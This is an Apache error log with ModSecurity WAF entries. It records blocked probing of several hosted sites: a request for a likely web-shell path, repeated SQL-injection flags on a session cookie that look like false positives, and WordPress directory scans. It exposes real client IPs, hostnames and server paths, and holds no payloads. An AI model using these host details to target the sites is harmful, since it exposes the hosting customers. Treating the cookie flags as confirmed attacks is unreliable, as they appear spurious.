[Tue May 12 03:35:05.394787 2026] [security2:error] [pid 1709071:tid 1709105] [client 216.73.216.110:56926] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKDybvMumyrWMfSu7q2hwAAANI"]
[Tue May 12 03:35:05.485374 2026] [security2:error] [pid 1709071:tid 1709105] [client 216.73.216.110:56926] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agKDybvMumyrWMfSu7q2hwAAANI"]
[Tue May 12 03:35:14.804866 2026] [autoindex:error] [pid 1695975:tid 1695993] [client 85.203.21.120:45261] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/query/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:35:16.099088 2026] [autoindex:error] [pid 1707624:tid 1707699] [client 85.203.21.92:51691] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/query/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/query/
[Tue May 12 03:35:17.397607 2026] [autoindex:error] [pid 1695975:tid 1695993] [client 85.203.21.120:45261] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/spacer/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:35:18.336117 2026] [autoindex:error] [pid 1707624:tid 1707699] [client 85.203.21.92:51691] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/spacer/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/spacer/
[Tue May 12 03:35:29.724796 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/v2"] [unique_id "agKD4dVI9ymHBxup74-YigAAAIE"]
[Tue May 12 03:35:29.724989 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/v2"] [unique_id "agKD4dVI9ymHBxup74-YigAAAIE"]
[Tue May 12 03:35:30.935029 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKD4dVI9ymHBxup74-YigAAAIE"]
[Tue May 12 03:35:33.667391 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/archive"] [unique_id "agKD5dVI9ymHBxup74-YjwAAAIE"]
[Tue May 12 03:35:33.667567 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/archive"] [unique_id "agKD5dVI9ymHBxup74-YjwAAAIE"]
[Tue May 12 03:35:34.264287 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKD5dVI9ymHBxup74-YjwAAAIE"]
[Tue May 12 03:35:34.623827 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/migrate"] [unique_id "agKD5tVI9ymHBxup74-YkAAAAIE"]
[Tue May 12 03:35:34.624026 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/migrate"] [unique_id "agKD5tVI9ymHBxup74-YkAAAAIE"]
[Tue May 12 03:35:35.219294 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKD5tVI9ymHBxup74-YkAAAAIE"]
[Tue May 12 03:35:35.454968 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/portal"] [unique_id "agKD59VI9ymHBxup74-YkgAAAIE"]
[Tue May 12 03:35:35.455174 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/portal"] [unique_id "agKD59VI9ymHBxup74-YkgAAAIE"]
[Tue May 12 03:35:36.058291 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKD59VI9ymHBxup74-YkgAAAIE"]
[Tue May 12 03:35:36.267235 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/members"] [unique_id "agKD6NVI9ymHBxup74-YkwAAAIE"]
[Tue May 12 03:35:36.267453 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/members"] [unique_id "agKD6NVI9ymHBxup74-YkwAAAIE"]
[Tue May 12 03:35:36.865553 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKD6NVI9ymHBxup74-YkwAAAIE"]
[Tue May 12 03:35:37.816507 2026] [proxy_fcgi:error] [pid 1695975:tid 1695993] [client 85.203.21.120:45261] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:35:39.707896 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/shop"] [unique_id "agKD69VI9ymHBxup74-YmAAAAIE"]
[Tue May 12 03:35:39.708113 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/shop"] [unique_id "agKD69VI9ymHBxup74-YmAAAAIE"]
[Tue May 12 03:35:40.300748 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKD69VI9ymHBxup74-YmAAAAIE"]
[Tue May 12 03:35:41.737158 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/store"] [unique_id "agKD7dVI9ymHBxup74-YmgAAAIE"]
[Tue May 12 03:35:41.737494 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/store"] [unique_id "agKD7dVI9ymHBxup74-YmgAAAIE"]
[Tue May 12 03:35:42.425893 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKD7dVI9ymHBxup74-YmgAAAIE"]
[Tue May 12 03:35:43.041244 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/clients"] [unique_id "agKD79VI9ymHBxup74-YpQAAAIE"]
[Tue May 12 03:35:43.041473 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/clients"] [unique_id "agKD79VI9ymHBxup74-YpQAAAIE"]
[Tue May 12 03:35:43.633002 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKD79VI9ymHBxup74-YpQAAAIE"]
[Tue May 12 03:35:43.933583 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/customer"] [unique_id "agKD79VI9ymHBxup74-YpwAAAIE"]
[Tue May 12 03:35:43.933788 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/customer"] [unique_id "agKD79VI9ymHBxup74-YpwAAAIE"]
[Tue May 12 03:35:44.516069 2026] [security2:error] [pid 1695975:tid 1695979] [client 172.104.186.23:39916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKD79VI9ymHBxup74-YpwAAAIE"]
[Tue May 12 03:35:55.638133 2026] [proxy_fcgi:error] [pid 1695975:tid 1695993] [client 85.203.21.120:45261] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:35:55.795715 2026] [proxy_fcgi:error] [pid 1695975:tid 1695993] [client 85.203.21.120:45261] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:36:05.492602 2026] [proxy_fcgi:error] [pid 1695975:tid 1695993] [client 85.203.21.120:45261] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:36:07.943294 2026] [proxy_fcgi:error] [pid 1695975:tid 1695993] [client 85.203.21.120:45261] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:36:08.105524 2026] [proxy_fcgi:error] [pid 1695975:tid 1695993] [client 85.203.21.120:45261] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:36:30.580367 2026] [proxy_fcgi:error] [pid 1695975:tid 1695993] [client 85.203.21.120:45261] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:36:30.738170 2026] [proxy_fcgi:error] [pid 1695975:tid 1695993] [client 85.203.21.120:45261] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:36:30.895413 2026] [proxy_fcgi:error] [pid 1695975:tid 1695993] [client 85.203.21.120:45261] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:36:47.369635 2026] [security2:error] [pid 1730175:tid 1730201] [client 172.104.186.23:49662] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/data"] [unique_id "agKEL3o6NvB9WXx5V-6IXwAAARg"]
[Tue May 12 03:36:47.369837 2026] [security2:error] [pid 1730175:tid 1730201] [client 172.104.186.23:49662] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/data"] [unique_id "agKEL3o6NvB9WXx5V-6IXwAAARg"]
[Tue May 12 03:36:48.519842 2026] [security2:error] [pid 1730175:tid 1730201] [client 172.104.186.23:49662] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKEL3o6NvB9WXx5V-6IXwAAARg"]
[Tue May 12 03:36:48.829123 2026] [autoindex:error] [pid 1695975:tid 1695993] [client 85.203.21.120:45261] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/js/tinymce/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:36:49.723102 2026] [autoindex:error] [pid 1709071:tid 1709109] [client 85.203.21.137:22555] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/js/tinymce/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/js/tinymce/
